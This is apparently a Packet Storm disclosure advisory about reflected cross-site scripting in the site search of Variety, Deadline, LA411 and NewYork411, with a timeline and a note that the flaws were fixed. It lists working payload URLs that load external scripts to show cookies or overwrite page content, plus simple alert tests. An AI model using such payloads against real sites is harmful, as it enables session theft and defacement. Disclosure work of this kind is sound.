Various Penske Media Corporation sites such as variety.com, la411.com, newyork411.com, and deadline.com all suffer from reflective cross site scripting vulnerabilities. Note that this finding houses site-specific data. Editor's note 01/04/2013: Per the advisory author, the issues have been resolved in all sites listed and Penske Media have addressed the issue.
0ee5e0affef62932ece9368ee73e2ab61594aecfc2a0ad7e7fc6c30c8d846b00----------------------------------------------------------------------------------------------------
Title : Penske Media Corporation reflected Cross Site Scripting (XSS) vulnerabilities
Vendor : Penske Media Corporation (http://www.pmc.com/)
Description : Multiple PMC web-sites are vulnerable to reflected Cross-site Scripting attacks
Advisory time-line:
----------------------------------------------------------------------------------------------------
- Vendor notified : 16-Oct-2012, 9-Nov-2012, 15-Nov-2012 - no responses
- Packet Storm advisory : 20-Nov-2012
Test environment
----------------------------------------------------------------------------------------------------
- Latest Firefox browser
Vulnerable PMC sites
----------------------------------------------------------------------------------------------------
- Variety.com
- La411.com
- newyork411.com
- deadline.com
Details
----------------------------------------------------------------------------------------------------
Affected functionality: site search
Test #1: Remote Javascript execution: display browser cookie
http://www.variety.com/search/?key=%3C/script%3E%3Cscript%20src=http://idash.net/xs.js%3E%3C/script%3E
http://www.la411.com/search/index.cfm?searchParam=%3C%2Fscript%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2Fscript%3Ei&x=0&y=0
http://www.newyork411.com/search/index.cfm?searchParam=%22%3E%27%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2Fscript%3Ei&x=0&y=0
http://www.deadline.com/?s=%22%3E%27%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2FSCRIPT%3E
Test #2, Remote Javascript execution: overwrite HTML content
http://www.variety.com/search/?key=%3C/script%3E%3Cscript%20src=http://idash.net/fr.js%3E%3C/script%3E
http://www.la411.com/search/index.cfm?searchParam=%3C%2Fscript%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Ffr.js%3E%3C%2Fscript%3Ei&x=0&y=0
http://www.newyork411.com/search/index.cfm?searchParam=%22%3E%27%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Ffr.js%3E%3C%2Fscript%3Ei&x=0&y=0
http://www.deadline.com/?s=%22%3E%27%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Ffr.js%3E%3C%2FSCRIPT%3E
Test #3, Simple alert
http://www.variety.com/search/?key=%3C/script%3E%3Cscript%3E+-+-1-+-+alert%28/XSS/%29%3C/script%3E
http://www.la411.com/search/index.cfm?searchParam=%22%3E%27%3E%3Cimg+src%3Dx+onerror%3Dprompt%28/XSS/%29%3E&x=0&y=0
http://www.newyork411.com/search/index.cfm?searchParam=%22%3E%27%3E%3Cimg+src%3Dx+onerror%3Dprompt%28/XSS/%29%3E&x=0&y=0
http://www.deadline.com/?s=%22%3E%27%3E%3CSCRIPT%3Eprompt%28/XSS/%29%3C%2FSCRIPT%3E
Note: the test cases are not malicious.
Researcher
----------------------------------------------------------------------------------------------------
Janne Ahlberg
Project site: http://idash.net
Twitter: https://twitter.com/JanneFI
----------------------------------------------------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed